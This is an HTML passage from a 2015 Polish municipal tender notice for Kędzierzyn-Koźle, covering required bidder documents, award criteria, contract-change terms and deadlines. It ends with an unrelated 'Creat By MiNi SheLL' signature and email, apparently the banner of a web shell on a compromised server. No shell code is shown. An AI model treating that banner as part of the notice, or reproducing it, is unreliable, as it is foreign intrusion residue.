<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie (druk nr 20) potwierdzające prawo do podpisywania wniosku o dopuszczenie do postępowania lub oferty, a tym samym posiadające prawo zaciągania zobowiązań lub składania oświadczenia woli w imieniu Wykonawcy Wykonawca zagraniczny składa oświadczenie jak wyżej. W przypadku ofert wspólnych, wszyscy wykonawcy nie prowadzący działalności, a występujący wspólnie składają wymagane oświadczenie. W przypadku osoby udostępniającej swoje zasoby zgodnie z art. 26 ust. 2b ustawy Pzp i biorącej udział w realizacji części zamówienia składa także niniejszy dokument.;

Oświadczenie Wykonawcy (druk nr 2) o spełnieniu warunków udziału w postępowaniu wymienionych w art. 22 ust. 1 ustawy Pzp.  W przypadku ofert wspólnych, oświadczenie w imieniu wykonawców występujących wspólnie, składa upełnomocniony lider lub wszyscy wykonawcy składają oświadczenie wspólne.;

Formularz oferty wypełniony ściśle wg załączonego do SIWZ wzoru druku z kompletem oświadczeń dotyczących spełnienia warunków oferty i udzielenia zamówienia oraz podpisany przez upełnomocnionego przedstawiciela wykonawcy określonego aktem rejestrowym z podaniem imienia i nazwiska.;

Pełnomocnictwo wystawione wg wzoru załączonego do niniejszej SIWZ lub pełnomocnictwa udzielane przez Wykonawcę.  W przypadku przedkładania kopii pełnomocnictw muszą być one potwierdzone (uwierzytelnione) notarialnie za zgodność z oryginałem.;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmiana terminu realizacji zadania w przypadku:
a) Wystąpienia siły wyższej (powódź, huragan, katastrofa budowlana, deszcz nawalny, pożar, uderzenie pioruna, zapadanie lub osuwanie się ziemi, zalanie, uderzenie pojazdu) lub warunków pogodowych niepozwalających na zachowanie parametrów technologicznych lub jakościowych realizowanych robót. Podstawą żądania przedłużenia terminu umownego jest przerwanie robót przez Zamawiającego, potwierdzone wpisem do Dziennika Budowy.
b) Wystąpienie okoliczności lub zdarzeń uniemożliwiających realizację w wyznaczonym terminie przedmiotu zamówienia bez usunięcia bądź likwidacji powyższych okoliczności lub zdarzeń niezależnych od stron umowy, których wystąpienia nie można było przewidzieć w dniu zawarcia umowy. Warunkiem zmiany terminu umownego realizacji przedmiotu zamówienia w w/w przypadku jest pisemne stwierdzenie przez Zamawiającego konieczności zmiany terminu umownego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.kedzierzynkozle.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych Urzędu Miasta Kędzierzyn-Koźle, ul. Piramowicza 32/pok. 417, III p 47-200 Kędzierzyn-Koźle.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2015 godzina 11:00, miejsce: Wydział Zamówień Publicznych Urzędu Miasta Kędzierzyn-Koźle, ul. Piramowicza 32/pok. 417, III p 47-200 Kędzierzyn-Koźle.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com